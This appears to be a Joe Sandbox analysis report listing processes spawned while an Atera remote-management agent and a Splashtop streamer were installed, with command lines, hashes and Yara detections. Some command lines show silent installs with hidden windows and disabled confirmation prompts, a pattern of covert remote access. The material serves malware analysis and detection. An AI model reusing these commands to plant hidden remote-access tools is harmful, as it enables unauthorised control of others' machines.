                                                                                                                                                                                                                                                                                              Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                              Commandline:C:\Windows\System32\svchost.exe -k smphost
                                                                                                                                                                                                                                                                                              Imagebase:0x7ff6eef20000
                                                                                                                                                                                                                                                                                              File size:55'320 bytes
                                                                                                                                                                                                                                                                                              MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                              Has exited:false

                                                                                                                                                                                                                                                                                              Target ID:42
                                                                                                                                                                                                                                                                                              Start time:06:59:06
                                                                                                                                                                                                                                                                                              Start date:06/01/2025
                                                                                                                                                                                                                                                                                              Path:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe
                                                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                              Commandline:"C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe" 52187e48-563c-468d-9785-3542f81fb412 "e82d88f8-5758-4c6f-9f7b-8b023b21ca56" agent-api.atera.com/Production 443 or8ixLi90Mf "checkforupdates" 001Q300000P2oAPIAZ
                                                                                                                                                                                                                                                                                              Imagebase:0x22039cd0000
                                                                                                                                                                                                                                                                                              File size:57'896 bytes
                                                                                                                                                                                                                                                                                              MD5 hash:E9794F785780945D2DDE78520B9BB59F
                                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe, Author: Joe Security
                                                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                                                              Target ID:43
                                                                                                                                                                                                                                                                                              Start time:06:59:06
                                                                                                                                                                                                                                                                                              Start date:06/01/2025
                                                                                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                              Has exited:false

                                                                                                                                                                                                                                                                                              Target ID:44
                                                                                                                                                                                                                                                                                              Start time:06:59:09
                                                                                                                                                                                                                                                                                              Start date:06/01/2025
                                                                                                                                                                                                                                                                                              Path:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe
                                                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                              Commandline:"C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe" 52187e48-563c-468d-9785-3542f81fb412 "c4c25269-0a4b-4daf-adc0-e2db93d9b9dd" agent-api.atera.com/Production 443 or8ixLi90Mf "maintain" 001Q300000P2oAPIAZ
                                                                                                                                                                                                                                                                                              Imagebase:0x214714d0000
                                                                                                                                                                                                                                                                                              File size:33'320 bytes
                                                                                                                                                                                                                                                                                              MD5 hash:2EC1D28706B9713026E8C6814E231D7C
                                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe, Author: Joe Security
                                                                                                                                                                                                                                                                                              Has exited:false

                                                                                                                                                                                                                                                                                              Target ID:45
                                                                                                                                                                                                                                                                                              Start time:06:59:09
                                                                                                                                                                                                                                                                                              Start date:06/01/2025
                                                                                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                              Has exited:false

                                                                                                                                                                                                                                                                                              Target ID:46
                                                                                                                                                                                                                                                                                              Start time:06:59:10
                                                                                                                                                                                                                                                                                              Start date:06/01/2025
                                                                                                                                                                                                                                                                                              Path:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe
                                                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                              Commandline:"C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe" schedulerrun
                                                                                                                                                                                                                                                                                              Imagebase:0x18457420000
                                                                                                                                                                                                                                                                                              File size:57'896 bytes
                                                                                                                                                                                                                                                                                              MD5 hash:E9794F785780945D2DDE78520B9BB59F
                                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                                                              Target ID:47
                                                                                                                                                                                                                                                                                              Start time:06:59:11
                                                                                                                                                                                                                                                                                              Start date:06/01/2025
                                                                                                                                                                                                                                                                                              Path:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\AgentPackageInternalPoller.exe
                                                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                              Commandline:"C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\AgentPackageInternalPoller.exe" 52187e48-563c-468d-9785-3542f81fb412 "440dfd42-8399-4319-8ab9-c9695127bb3a" agent-api.atera.com/Production 443 or8ixLi90Mf "pollAll" 001Q300000P2oAPIAZ
                                                                                                                                                                                                                                                                                              Imagebase:0x22b81dc0000
                                                                                                                                                                                                                                                                                              File size:219'696 bytes
                                                                                                                                                                                                                                                                                              MD5 hash:01807774F043028EC29982A62FA75941
                                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\AgentPackageInternalPoller.exe, Author: Joe Security
                                                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                                                              Target ID:48
                                                                                                                                                                                                                                                                                              Start time:06:59:11
                                                                                                                                                                                                                                                                                              Start date:06/01/2025
                                                                                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                                                              Target ID:49
                                                                                                                                                                                                                                                                                              Start time:06:59:11
                                                                                                                                                                                                                                                                                              Start date:06/01/2025
                                                                                                                                                                                                                                                                                              Path:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                              Commandline:"C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe" 52187e48-563c-468d-9785-3542f81fb412 "625a9ffc-3a6c-4d9d-b846-9cb0081c4ad4" agent-api.atera.com/Production 443 or8ixLi90Mf "syncinstalledapps" 001Q300000P2oAPIAZ
                                                                                                                                                                                                                                                                                              Imagebase:0x153fcb70000
                                                                                                                                                                                                                                                                                              File size:57'896 bytes
                                                                                                                                                                                                                                                                                              MD5 hash:CB9890B01A396F64D702AD10F441003A
                                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000031.00000002.2967276692.00000153FCDD6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000031.00000002.2835718988.00000153805C8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000031.00000002.2835718988.000001538059E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000031.00000002.2835718988.00000153804BF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000031.00000002.2835718988.000001538063F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000031.00000002.2835718988.0000015380590000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000031.00000002.2972609455.00000153FD172000.00000002.00000001.01000000.00000049.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000031.00000002.2976094132.00000153FD49F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000031.00000002.2967276692.00000153FCD2F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000031.00000002.2981477200.00000153FE0A7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000031.00000002.2835718988.00000153803ED000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000031.00000002.2981477200.00000153FE030000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000031.00000002.2835718988.000001538023D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000031.00000002.2835718988.0000015380954000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000031.00000002.2835718988.0000015380629000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000031.00000002.2835718988.0000015380589000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000031.00000002.2973645453.00000153FD415000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000031.00000002.2835718988.00000153806F4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000031.00000002.2967276692.00000153FCD58000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000031.00000002.2967276692.00000153FCD10000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000031.00000002.2835718988.0000015380505000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000031.00000002.2835718988.0000015380001000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe, Author: Joe Security
                                                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                                                              Target ID:50
                                                                                                                                                                                                                                                                                              Start time:06:59:11
                                                                                                                                                                                                                                                                                              Start date:06/01/2025
                                                                                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                              Has exited:false

                                                                                                                                                                                                                                                                                              Target ID:51
                                                                                                                                                                                                                                                                                              Start time:06:59:12
                                                                                                                                                                                                                                                                                              Start date:06/01/2025
                                                                                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                                                              Target ID:52
                                                                                                                                                                                                                                                                                              Start time:06:59:12
                                                                                                                                                                                                                                                                                              Start date:06/01/2025
                                                                                                                                                                                                                                                                                              Path:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                              Commandline:"msiexec.exe" /i C:\Windows\TEMP\ateraAgentSetup64_1_8_7_2.msi /lv* AteraSetupLog.txt /qn /norestart
                                                                                                                                                                                                                                                                                              Imagebase:0x7ff7da920000
                                                                                                                                                                                                                                                                                              File size:69'632 bytes
                                                                                                                                                                                                                                                                                              MD5 hash:E5DA170027542E25EDE42FC54C929077
                                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                                                              Target ID:53
                                                                                                                                                                                                                                                                                              Start time:06:59:13
                                                                                                                                                                                                                                                                                              Start date:06/01/2025
                                                                                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                              Commandline:C:\Windows\syswow64\MsiExec.exe -Embedding 512046948B0983DC32EDE392DA99D036 E Global\MSI0000
                                                                                                                                                                                                                                                                                              Imagebase:0x2b0000
                                                                                                                                                                                                                                                                                              File size:59'904 bytes
                                                                                                                                                                                                                                                                                              MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                                                              Target ID:54
                                                                                                                                                                                                                                                                                              Start time:06:59:13
                                                                                                                                                                                                                                                                                              Start date:06/01/2025
                                                                                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                              Commandline:rundll32.exe "C:\Windows\Installer\MSI5085.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_6967703 37 AlphaControlAgentInstallation!AlphaControlAgentInstallation.CustomActions.GenerateAgentId
                                                                                                                                                                                                                                                                                              Imagebase:0x880000
                                                                                                                                                                                                                                                                                              File size:61'440 bytes
                                                                                                                                                                                                                                                                                              MD5 hash:889B99C52A60DD49227C5E485A016679
                                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000036.00000003.2409510449.0000000004044000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                                                              Target ID:55
                                                                                                                                                                                                                                                                                              Start time:06:59:15
                                                                                                                                                                                                                                                                                              Start date:06/01/2025
                                                                                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                              Commandline:rundll32.exe "C:\Windows\Installer\MSI5885.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_6969500 41 AlphaControlAgentInstallation!AlphaControlAgentInstallation.CustomActions.ReportMsiStart
                                                                                                                                                                                                                                                                                              Imagebase:0x880000
                                                                                                                                                                                                                                                                                              File size:61'440 bytes
                                                                                                                                                                                                                                                                                              MD5 hash:889B99C52A60DD49227C5E485A016679
                                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000037.00000002.2573114268.0000000004B51000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000037.00000002.2573114268.0000000004BF4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000037.00000003.2425788970.00000000047F0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                                                              Target ID:56
                                                                                                                                                                                                                                                                                              Start time:06:59:19
                                                                                                                                                                                                                                                                                              Start date:06/01/2025
                                                                                                                                                                                                                                                                                              Path:C:\Windows\Temp\SplashtopStreamer.exe
                                                                                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                              Commandline:"C:\Windows\TEMP\SplashtopStreamer.exe" prevercheck /s /i sec_opt=0,confirm_d=0,hidewindow=1
                                                                                                                                                                                                                                                                                              Imagebase:0x400000
                                                                                                                                                                                                                                                                                              File size:56'907'920 bytes
                                                                                                                                                                                                                                                                                              MD5 hash:9CD6BA3AD27DAC967F073CBCAD88FEF9
                                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000038.00000002.2594283775.00000000001D0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000038.00000002.2600454958.0000000000570000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                                                              Target ID:57
                                                                                                                                                                                                                                                                                              Start time:06:59:21
                                                                                                                                                                                                                                                                                              Start date:06/01/2025
                                                                                                                                                                                                                                                                                              Path:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSystemTools\AgentPackageSystemTools.exe
                                                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                              Commandline:"C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSystemTools\AgentPackageSystemTools.exe" 52187e48-563c-468d-9785-3542f81fb412 "c714c0bb-2ce8-418e-929f-2ec4a445cfb0" agent-api.atera.com/Production 443 or8ixLi90Mf "probe" 001Q300000P2oAPIAZ
                                                                                                                                                                                                                                                                                              Imagebase:0x25fbf120000
                                                                                                                                                                                                                                                                                              File size:51'752 bytes
                                                                                                                                                                                                                                                                                              MD5 hash:5BB0687E2384644EA48F688D7E75377B
                                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000039.00000002.2544967022.0000025FD83A0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000039.00000002.2530880306.0000025FBF520000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000039.00000002.2513781301.0000025FBF362000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000039.00000002.2513781301.0000025FBF320000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000039.00000002.2537521563.0000025FBFBCE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000039.00000002.2534525146.0000025FBFA22000.00000002.00000001.01000000.0000003D.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000039.00000002.2513781301.0000025FBF32C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000039.00000002.2537521563.0000025FBFAE1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000039.00000002.2544967022.0000025FD83E5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000039.00000002.2513781301.0000025FBF3AE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000039.00000000.2484363303.0000025FBF122000.00000002.00000001.01000000.0000003C.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000039.00000002.2537521563.0000025FBFB5C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSystemTools\AgentPackageSystemTools.exe, Author: Joe Security
                                                                                                                                                                                                                                                                                              Has exited:true

Target ID: 58
Start time: 06:59:22
Start date: 06/01/2025
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7699e0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 60
Start time: 06:59:22
Start date: 06/01/2025
Path: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe
Wow64 process (32bit): false
Commandline: "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe" 52187e48-563c-468d-9785-3542f81fb412 "f6b70a2c-1bfd-4903-a0e1-81c5afac28c1" agent-api.atera.com/Production 443 or8ixLi90Mf "monitor" 001Q300000P2oAPIAZ
Imagebase: 0x29e21210000
File size: 407'080 bytes
MD5 hash: 810F893E58861909B134FA72E3BC90CD
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000003C.00000002.2941928264.00007FFDF08E9000.00000004.00000001.01000000.0000001E.sdmp, Author: Joe Security
Has exited: true

Target ID: 61
Start time: 06:59:22
Start date: 06/01/2025
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7699e0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: false

                                                                                                                                                                                                                                                                                              Reset < >
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000003.00000003.1662560059.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_3_6f90000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID: $kq$$kq
                                                                                                                                                                                                                                                                                                • API String ID: 0-3550614674
